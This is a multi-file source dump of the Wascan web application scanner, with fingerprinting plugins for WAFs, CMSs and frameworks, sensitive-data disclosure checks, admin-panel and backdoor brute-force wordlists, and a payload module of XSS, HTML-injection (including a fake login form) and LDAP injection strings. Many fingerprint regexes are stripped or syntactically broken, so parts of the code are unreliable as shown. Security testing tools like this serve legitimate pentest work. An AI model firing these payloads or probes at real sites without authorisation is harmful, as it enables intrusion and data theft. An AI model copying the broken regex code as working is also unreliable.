coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def secureiis(headers,content): 12 | _ = False 13 | _ |= search(r"SecureIIS[^<]+Web Server Protection",content) is not None 14 | _ |= search(r"http://www.eeye.com/SecureIIS/",content) is not None 15 | _ |= search(r"\?subject=[^>]*SecureIIS Error",content) is not None 16 | if _ : 17 | return "SecureIIS Web Server Security (BeyondTrust)" -------------------------------------------------------------------------------- /plugins/disclosure/creditcards.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import * 10 | from lib.parser.parse import * 11 | 12 | def creditcards(content): 13 | _list_ = parse(content).getcc() 14 | if _list_ != None or _list_ != []: 15 | if len(_list_) >= 2: 16 | plus('Credit card number disclosure: %s'%(str(_list_).split('[')[1].split(']')[0])) 17 | elif len(_list_) == 1: 18 | plus('Credit card number disclosure: %s'%_list_[0]) -------------------------------------------------------------------------------- /plugins/disclosure/privateip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import * 10 | from lib.parser.parse import * 11 | 12 | def privateip(content): 13 | _list_ = parse(content).getip() 14 | if _list_ != None or _list_ != []: 15 | if len(_list_) >= 2: 16 | plus('Private IP address disclosure: %s'%(str(_list_).split('[')[1].split(']')[0])) 17 | elif len(_list_) == 1: 18 | plus('Private IP address disclosure: %s'%_list_[0]) -------------------------------------------------------------------------------- /plugins/disclosure/ssn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import * 10 | from lib.parser.parse import * 11 | 12 | def ssn(content): 13 | _list_ = parse(content).getssn() 14 | if _list_ != None or _list_ != []: 15 | if len(_list_) >= 2: 16 | plus('US Social Security Number disclosure: %s'%(str(_list_).split('[')[1].split(']')[0])) 17 | elif len(_list_) == 1: 18 | plus('US Social Security Number disclosure: %s'%_list_[0]) -------------------------------------------------------------------------------- /plugins/fingerprint/waf/bigip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def bigip(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0].lower() == "x-cnection" 15 | _ |= header[0].lower() == "x-wa-info" 16 | _ |= search(r'\ATS\w{4,}=|bigip|bigipserver|\AF5\Z',header[1],I) is not None 17 | if _: break 18 | if _ : 19 | return "BIG-IP Application Security Manager (F5 Networks)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/sucuri.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def sucuri(headers,content): 12 | _ = False 13 | _ |= search(r"Questions\?.+cloudproxy@sucuri\.net",content) is not None 14 | _ |= search(r"Sucuri WebSite Firewall - CloudProxy - Access Denied",content) is not None 15 | _ |= search('sucuri/cloudproxy',str(headers.values()),I) is not None 16 | if _ : 17 | return "CloudProxy WebSite Firewall (Sucuri)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/requestvalidationmode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def requestvalidationmode(headers,content): 12 | _ = False 13 | _ |= search(r'ASP.NET has detected data in the request that is potentially dangerous',content) is not None 14 | _ |= search(r'Request Validation has detected a potentially dangerous client input value',content) is not None 15 | if _ : 16 | return "ASP.NET RequestValidationMode (Microsoft)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/incapsula.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def incapsula(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'incap_ses|visid_incap',header[1],I) is not None 15 | _ |= search(r'incapsula',header[1],I) is not None 16 | if _:break 17 | _ |= search(r'Incapsula incident ID',content) is not None 18 | if _ : 19 | return "Incapsula Web Application Firewall (Incapsula/Imperva)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/jiasule.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def jiasule(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'__jsluid=|jsl_tracking',header[1],I) is not None 15 | _ |= search(r'jiasule-waf',header[1],I) is not None 16 | if _:break 17 | _ |= search(r'static\.jiasule\.com/static/js/http_error\.js',content) is not None 18 | if _ : 19 | return "Jiasule Web Application Firewall (Jiasule)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/cloudflare.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def cloudflare(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0].lower() == "cf-ray" 15 | _ |= search(r'__cfduid=|cloudflare-nginx|cloudflare[-]',header[1],I) is not None 16 | if _: break 17 | _ |= search(r"CloudFlare Ray ID:|var CloudFlare=",content) is not None 18 | if _ : 19 | return "CloudFlare Web Application Firewall (CloudFlare)" -------------------------------------------------------------------------------- /lib/handler/crawler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import info 10 | from lib.request.crawler import SCrawler 11 | 12 | class Crawler: 13 | """ cralwer """ 14 | def run(self, kwargs, url, data): 15 | info("Starting crawler...") 16 | links = [] 17 | links.append(url) 18 | for link in links: 19 | for k in SCrawler(kwargs, url, data).run(): 20 | if k not in links: 21 | links.append(k) 22 | return links 23 | -------------------------------------------------------------------------------- /lib/utils/exception.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | from urllib2 import HTTPError 10 | 11 | class WascanUnboundLocalError(UnboundLocalError): 12 | pass 13 | 14 | class WascanDataException(Exception): 15 | pass 16 | 17 | class WascanNoneException(Exception): 18 | pass 19 | 20 | class WascanInputException(Exception): 21 | pass 22 | 23 | class WascanGenericException(Exception): 24 | pass 25 | 26 | class WascanConnectionException(HTTPError): 27 | pass 28 | 29 | class WascanKeyboardInterrupt(KeyboardInterrupt): 30 | pass -------------------------------------------------------------------------------- /plugins/fingerprint/framework/seagull.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def seagull(headers,content): 12 | _ = False 13 | _ |= search(r"",content) is not None 14 | _ |= search(r"Powered by \Seagull PHP Framework<\/a\>",content) is not None 15 | _ |= search(r"var SGL_JS_SESSID[\s]*=",content) is not None 16 | if _: return "Seagull - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/cms/wordpress.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | from re import search,I 10 | 11 | def wordpress(headers,content): 12 | _ = False 13 | _ |= search(r"\",content) is not None 14 | _ |= search(r"\Powered by WordPress\<\/a\>",content) is not None 15 | _ |= search(r"\\Welcome to Django\<\/title\>",content) is not None 19 | if _ : return "Django - Python Framework" -------------------------------------------------------------------------------- /lib/handler/audit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from plugins.audit.xst import * 10 | from plugins.audit.apache import * 11 | from plugins.audit.dav import * 12 | from plugins.audit.phpinfo import * 13 | from plugins.audit.robots import * 14 | from lib.utils.printer import * 15 | 16 | 17 | def Audit(kwargs, url, data): 18 | info("Starting audit module...") 19 | xst(kwargs, url, data).run() 20 | apache(kwargs, url, data).run() 21 | # dav(kwargs, url, data).run() 22 | phpinfo(kwargs, url, data).run() 23 | robots(kwargs, url, data).run() 24 | null() 25 | -------------------------------------------------------------------------------- /plugins/fingerprint/server/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.request.request import * 10 | from lib.utils.rand import * 11 | 12 | class server(Request): 13 | def __init__(self,kwargs,url): 14 | Request.__init__(self,kwargs) 15 | self.url = url 16 | 17 | def run(self): 18 | server = "" 19 | try: 20 | resp = self.Send(url=self.url,method="GET",headers={r_string(5) : r_string(10)}) 21 | for item in resp.headers.items(): 22 | if item[0].lower() == "server": 23 | server += item[1] 24 | break 25 | return server 26 | except Exception,e: 27 | pass -------------------------------------------------------------------------------- /plugins/fingerprint/framework/asp_mvc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def mvc(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0] == "x-aspnetmvc-version" 15 | _ |= header[0] == "x-aspnet-version" 16 | _ |= search(r"asp.net|anonymousID=|chkvalues=|__requestverificationtoken",header[1]) is not None 17 | if _ : break 18 | _ |= search(r"Web Settings for Active Server Pages",content) is not None 19 | _ |= search(r"name=\"__VIEWSTATEENCRYPTED\" id=\"__VIEWSTATEENCRYPTED\"",content) is not None 20 | if _ : return "ASP.NET Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/zend.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def zend(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search("zend",header[1]) is not None 15 | if _ : break 16 | _ |= search(r"\",content) is not None 20 | if _ : return "Zend - PHP Framework" -------------------------------------------------------------------------------- /lib/handler/brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from plugins.brute.adminpanel import * 10 | from plugins.brute.backdoor import * 11 | from plugins.brute.backupdir import * 12 | from plugins.brute.backupfile import * 13 | from plugins.brute.commondir import * 14 | from plugins.brute.commonfile import * 15 | 16 | 17 | def Brute(kwargs, url, data): 18 | info("Starting brute module...") 19 | backdoor(kwargs, url, data).run() 20 | backupdir(kwargs, url, data).run() 21 | backupfile(kwargs, url, data).run() 22 | commonfile(kwargs, url, data).run() 23 | commondir(kwargs, url, data).run() 24 | adminpanel(kwargs, url, data).run() 25 | null() 26 | -------------------------------------------------------------------------------- /lib/db/errors/xpath.json: -------------------------------------------------------------------------------- 1 | {"info":{"name":"XPath","regexp":["::xpath()","XPATH syntax error\\:","XPathException","XPath\\:","XPath\\(\\)","System.Xml.XPath.XPathException\\:","MS\\.Internal\\.Xml\\.","Unknown error in XPath","org.apache.xpath.XPath","A closing bracket expected in","An operand in Union Expression does not produce a node-set","Cannot convert expression to a number","Document Axis does not allow any context Location Steps","Empty Path Expression","Empty Relative Location Path","Empty Union Expression","Expected \\'\\)\\' in","Expected node test or name specification after axis operator","Incompatible XPath key","Incorrect Variable Binding","libxml2 library function failed","xmlsec library function","error \\'80004005\\'","A document must contain exactly one root element\\.","Expected token \\']\\'","\\msxml4.dll\\<\\/font\\>","4005 Notes error: Query is not understandable"]}} -------------------------------------------------------------------------------- /plugins/fingerprint/cms/silverstripe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | from re import search,I 10 | 11 | def silverstripe(headers,content): 12 | _ = False 13 | if 'set-cookie' in headers.keys(): 14 | _ |= search(r"PastVisitor=[0-9]+.*",headers["set-cookie"],I) is not None 15 | _ |= search(r"\]*content\=\"SilverStripe",content) is not None 16 | _ |= search(r"\]*stylesheet[^>]*layout.css[^>]*\>[^<]*\]*stylesheet[^>]*typography.css[^>]*\>[^<]*\]*stylesheet[^>]*form.css[^>]*\>",content) is not None 17 | _ |= search(r"\",content) is not None 16 | _ |= search(r"\",content) is not None 17 | _ |= search(r"Powered by \Joomla!\<\/a\>.",content) is not None 18 | if _ : return "Joomla" -------------------------------------------------------------------------------- /lib/db/adminpanel.wascan: -------------------------------------------------------------------------------- 1 | admin 2 | admin.asp 3 | admin.aspx 4 | admin.cfm 5 | admin.cgi 6 | admin.do 7 | admin.htm 8 | admin.py 9 | sadmin 10 | cmsadmin 11 | admin.db 12 | admin.ctp 13 | admin.ini 14 | admin.tpl 15 | admin.xml 16 | admin.html 17 | admin.jsp 18 | admin.php 19 | admin.php3 20 | admin2 21 | admin_ 22 | admin_login 23 | admin_logon 24 | administracion 25 | administrador 26 | administrateur 27 | administration 28 | administrator 29 | amministratore 30 | administrator 31 | adminlogon 32 | authadmin 33 | backend 34 | console 35 | fpadmin 36 | iisadmin 37 | manage 38 | manager 39 | phpmyadmin 40 | portal 41 | siteadmin 42 | staff 43 | user 44 | users 45 | usuario 46 | usuarios 47 | webadmin 48 | wp-admin 49 | wp-login.php 50 | ~admin 51 | _admin 52 | admin2.php 53 | admin.html 54 | admins.php 55 | admin.php3 56 | admin.aspx 57 | _admin.php 58 | admin1.php 59 | admin.thtml 60 | admin.rhtml 61 | xgadmin.asp 62 | pnadmin.php -------------------------------------------------------------------------------- /lib/handler/disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | 10 | from plugins.disclosure.creditcards import * 11 | from plugins.disclosure.emails import * 12 | from plugins.disclosure.privateip import * 13 | from plugins.disclosure.ssn import * 14 | from lib.request.request import * 15 | from plugins.disclosure.errors import * 16 | from lib.utils.printer import * 17 | 18 | class Disclosure(Request): 19 | """ Disclosure """ 20 | def __init__(self,kwargs,url,data): 21 | Request.__init__(self,kwargs) 22 | self.url = url 23 | 24 | def run(self): 25 | info('Starting disclosure module...') 26 | req = self.Send(url=self.url,method="GET") 27 | creditcards(req.content) 28 | emails(req.content) 29 | privateip(req.content) 30 | ssn(req.content) 31 | errors(req.content,req.url) 32 | null() -------------------------------------------------------------------------------- /plugins/fingerprint/cms/drupal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | from re import search,I 10 | 11 | def drupal(headers,content): 12 | _ = False 13 | if 'set-cookie' in headers.keys(): 14 | _ |= search(r"SESS[a-z0-9]{32}=[a-z0-9]{32}",headers["set-cookie"],I) is not None 15 | if 'x-drupal-cache' in headers.keys():_ |= True 16 | _ |= search(r"\"] 23 | payload += [r""] 24 | payload += [r"\'\';!--\"<"+r_string(5)+r">=&{()}"] 25 | payload += [r""] 30 | payload += [r""] 31 | payload += [r"alert\`"+r_string(5)+r"\`"] 32 | payload += [r">

%s

"%(r_string(20))] 159 | payload += ["

%s

"%(r_string(20))] 160 | payload += ["

Login

"%(r_string(30))] 161 | return payload 162 | 163 | def ldap(): 164 | """ LDAP Injection """ 165 | payload = ["!"] 166 | payload += ["%29"] 167 | payload += ["%21"] 168 | payload += ["%28"] 169 | payload += ["%26"] 170 | payload += ["("] 171 | payload += [")"] 172 | payload += ["@\'"] 173 | payload += ["*()|&'"] 174 | payload += ["%s*"%r_string(10)] 175 | payload += ["*(|(%s=*))"%r_string(10)] 176 | payload += ["%s*)((|%s=*)"%(r_string(10),r_string(10))] 177 | payload += [r"%2A%28%7C%28"+r_string(10)+r"%3D%2A%29%29"] 178 | return payload 179 | -------------------------------------------------------------------------------- /lib/handler/fingerprint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import * 10 | from lib.request.request import * 11 | from plugins.fingerprint.cms.drupal import * 12 | from plugins.fingerprint.cms.joomla import * 13 | from plugins.fingerprint.cms.magento import * 14 | from plugins.fingerprint.cms.plone import * 15 | from plugins.fingerprint.cms.silverstripe import * 16 | from plugins.fingerprint.cms.wordpress import * 17 | from plugins.fingerprint.framework.asp_mvc import * 18 | from plugins.fingerprint.framework.cakephp import * 19 | from plugins.fingerprint.framework.codeigniter import * 20 | from plugins.fingerprint.framework.cherrypy import * 21 | from plugins.fingerprint.framework.dancer import * 22 | from plugins.fingerprint.framework.django import * 23 | from plugins.fingerprint.framework.flask import * 24 | from plugins.fingerprint.framework.fuelphp import * 25 | from plugins.fingerprint.framework.grails import * 26 | from plugins.fingerprint.framework.horde import * 27 | from plugins.fingerprint.framework.karrigell import * 28 | from plugins.fingerprint.framework.larvel import * 29 | from plugins.fingerprint.framework.nette import * 30 | from plugins.fingerprint.framework.phalcon import * 31 | from plugins.fingerprint.framework.play import * 32 | from plugins.fingerprint.framework.rails import * 33 | from plugins.fingerprint.framework.seagull import * 34 | from plugins.fingerprint.framework.spring import * 35 | from plugins.fingerprint.framework.symfony import * 36 | from plugins.fingerprint.framework.web2py import * 37 | from plugins.fingerprint.framework.yii import * 38 | from plugins.fingerprint.framework.zend import * 39 | from plugins.fingerprint.header.cookies import * 40 | from plugins.fingerprint.header.header import * 41 | from plugins.fingerprint.language.asp import * 42 | from plugins.fingerprint.language.aspnet import * 43 | from plugins.fingerprint.language.coldfusion import * 44 | from plugins.fingerprint.language.flash import * 45 | from plugins.fingerprint.language.java import * 46 | from plugins.fingerprint.language.perl import * 47 | from plugins.fingerprint.language.php import * 48 | from plugins.fingerprint.language.python import * 49 | from plugins.fingerprint.language.ruby import * 50 | from plugins.fingerprint.os.bsd import * 51 | from plugins.fingerprint.os.ibm import * 52 | from plugins.fingerprint.os.linux import * 53 | from plugins.fingerprint.os.mac import * 54 | from plugins.fingerprint.os.solaris import * 55 | from plugins.fingerprint.os.unix import * 56 | from plugins.fingerprint.os.windows import * 57 | from plugins.fingerprint.server.server import * 58 | from plugins.fingerprint.waf.airlock import * 59 | from plugins.fingerprint.waf.anquanbao import * 60 | from plugins.fingerprint.waf.armor import * 61 | from plugins.fingerprint.waf.aws import * 62 | from plugins.fingerprint.waf.asm import * 63 | from plugins.fingerprint.waf.baidu import * 64 | from plugins.fingerprint.waf.barracuda import * 65 | from plugins.fingerprint.waf.betterwpsecurity import * 66 | from plugins.fingerprint.waf.bigip import * 67 | from plugins.fingerprint.waf.binarysec import * 68 | from plugins.fingerprint.waf.blockdos import * 69 | from plugins.fingerprint.waf.ciscoacexml import * 70 | from plugins.fingerprint.waf.cloudflare import * 71 | from plugins.fingerprint.waf.cloudfront import * 72 | from plugins.fingerprint.waf.comodo import * 73 | from plugins.fingerprint.waf.datapower import * 74 | from plugins.fingerprint.waf.denyall import * 75 | from plugins.fingerprint.waf.dotdefender import * 76 | from plugins.fingerprint.waf.edgecast import * 77 | from plugins.fingerprint.waf.expressionengine import * 78 | from plugins.fingerprint.waf.fortiweb import * 79 | from plugins.fingerprint.waf.hyperguard import * 80 | from plugins.fingerprint.waf.incapsula import * 81 | from plugins.fingerprint.waf.isaserver import * 82 | from plugins.fingerprint.waf.jiasule import * 83 | from plugins.fingerprint.waf.knownsec import * 84 | from plugins.fingerprint.waf.kona import * 85 | from plugins.fingerprint.waf.modsecurity import * 86 | from plugins.fingerprint.waf.netcontinuum import * 87 | from plugins.fingerprint.waf.netscaler import * 88 | from plugins.fingerprint.waf.newdefend import * 89 | from plugins.fingerprint.waf.nsfocus import * 90 | from plugins.fingerprint.waf.paloalto import * 91 | from plugins.fingerprint.waf.profense import * 92 | from plugins.fingerprint.waf.radware import * 93 | from plugins.fingerprint.waf.requestvalidationmode import * 94 | from plugins.fingerprint.waf.safe3 import * 95 | from plugins.fingerprint.waf.safedog import * 96 | from plugins.fingerprint.waf.secureiis import * 97 | from plugins.fingerprint.waf.senginx import * 98 | from plugins.fingerprint.waf.sitelock import * 99 | from plugins.fingerprint.waf.sonicwall import * 100 | from plugins.fingerprint.waf.sophos import * 101 | from plugins.fingerprint.waf.stingray import * 102 | from plugins.fingerprint.waf.sucuri import * 103 | from plugins.fingerprint.waf.teros import * 104 | from plugins.fingerprint.waf.trafficshield import * 105 | from plugins.fingerprint.waf.urlscan import * 106 | from plugins.fingerprint.waf.uspses import * 107 | from plugins.fingerprint.waf.varnish import * 108 | from plugins.fingerprint.waf.wallarm import * 109 | from plugins.fingerprint.waf.webknight import * 110 | from plugins.fingerprint.waf.yundun import * 111 | from plugins.fingerprint.waf.yunsuo import * 112 | 113 | 114 | class Fingerprint(Request): 115 | """Fingerprint""" 116 | def __init__(self,kwargs,url): 117 | Request.__init__(self,kwargs) 118 | self.kwarg = kwargs 119 | self.url = url 120 | 121 | def run(self): 122 | info('Starting fingerprint target...') 123 | try: 124 | req = self.Send(url=self.url,method="GET") 125 | s = server(self.kwarg,self.url).run() 126 | if s:plus('Server: %s'%(s)) 127 | cms = detectCms(req.headers,req.content) 128 | for c in cms: 129 | if c != None and c != "": 130 | plus('CMS: %s'%(c)) 131 | framework = detectFramework(req.headers,req.content) 132 | for f in framework: 133 | if f != None and f != "": 134 | plus('Framework: %s'%(f)) 135 | lang = detectLanguage(req.content) 136 | for l in lang: 137 | if l != None and l != "": 138 | plus('Language: %s'%(l)) 139 | os = detectOs(req.headers) 140 | for o in os: 141 | if o != None and o != "": 142 | plus('Operating System: %s'%o) 143 | waf = detectWaf(req.headers,req.content) 144 | for a in waf: 145 | if a != None and a != "": 146 | plus('Web Application Firewall (WAF): %s'%a) 147 | checkHeaders(req.headers,req.content) 148 | null() 149 | except Exception as e: 150 | print("Exception: {}".format(e)) 151 | 152 | def detectCms(headers,content): 153 | return (drupal(headers,content), 154 | joomla(headers,content), 155 | magento(headers,content), 156 | plone(headers,content), 157 | silverstripe(headers,content), 158 | wordpress(headers,content), 159 | ) 160 | 161 | def detectFramework(headers,content): 162 | return ( 163 | mvc(headers,content), 164 | cakephp(headers,content), 165 | cherrypy(headers,content), 166 | codeigniter(headers,content), 167 | dancer(headers,content), 168 | django(headers,content), 169 | flask(headers,content), 170 | fuelphp(headers,content), 171 | grails(headers,content), 172 | horde(headers,content), 173 | karrigell(headers,content), 174 | larvel(headers,content), 175 | nette(headers,content), 176 | phalcon(headers,content), 177 | play(headers,content), 178 | rails(headers,content), 179 | seagull(headers,content), 180 | spring(headers,content), 181 | symfony(headers,content), 182 | web2py(headers,content), 183 | yii(headers,content), 184 | zend(headers,content) 185 | ) 186 | 187 | def checkHeaders(headers,content): 188 | if 'cookie' in headers.keys(): 189 | if headers['cookie']:cookies().__run__(headers['cookie']) 190 | elif 'set-cookie' in headers.keys(): 191 | if headers['set-cookie']:cookies().__run__(headers['set-cookie']) 192 | header()._run_(headers) 193 | 194 | def detectLanguage(content): 195 | return ( 196 | asp(content), 197 | aspnet(content), 198 | coldfusion(content), 199 | flash(content), 200 | java(content), 201 | perl(content), 202 | php(content), 203 | python(content), 204 | ruby(content) 205 | ) 206 | 207 | def detectOs(headers): 208 | return ( 209 | bsd(headers), 210 | ibm(headers), 211 | linux(headers), 212 | mac(headers), 213 | solaris(headers), 214 | unix(headers), 215 | windows(headers) 216 | ) 217 | 218 | def detectWaf(headers,content): 219 | return ( 220 | airlock(headers,content), 221 | anquanboa(headers,content), 222 | armor(headers,content), 223 | asm(headers,content), 224 | aws(headers,content), 225 | baidu(headers,content), 226 | barracuda(headers,content), 227 | betterwpsecurity(headers,content), 228 | bigip(headers,content), 229 | binarysec(headers,content), 230 | blockdos(headers,content), 231 | ciscoacexml(headers,content), 232 | cloudflare(headers,content), 233 | cloudfront(headers,content), 234 | comodo(headers,content), 235 | datapower(headers,content), 236 | denyall(headers,content), 237 | dotdefender(headers,content), 238 | edgecast(headers,content), 239 | expressionengine(headers,content), 240 | fortiweb(headers,content), 241 | hyperguard(headers,content), 242 | incapsula(headers,content), 243 | isaserver(headers,content), 244 | jiasule(headers,content), 245 | knownsec(headers,content), 246 | kona(headers,content), 247 | modsecurity(headers,content), 248 | netcontinuum(headers,content), 249 | netscaler(headers,content), 250 | newdefend(headers,content), 251 | nsfocus(headers,content), 252 | paloalto(headers,content), 253 | profense(headers,content), 254 | radware(headers,content), 255 | requestvalidationmode(headers,content), 256 | safe3(headers,content), 257 | safedog(headers,content), 258 | secureiis(headers,content), 259 | senginx(headers,content), 260 | sitelock(headers,content), 261 | sonicwall(headers,content), 262 | sophos(headers,content), 263 | stingray(headers,content), 264 | sucuri(headers,content), 265 | teros(headers,content), 266 | trafficshield(headers,content), 267 | urlscan(headers,content), 268 | uspses(headers,content), 269 | varnish(headers,content), 270 | wallarm(headers,content), 271 | webknight(headers,content), 272 | yundun(headers,content), 273 | yunsuo(headers,content) 274 | ) --------------------------------------------------------------------------------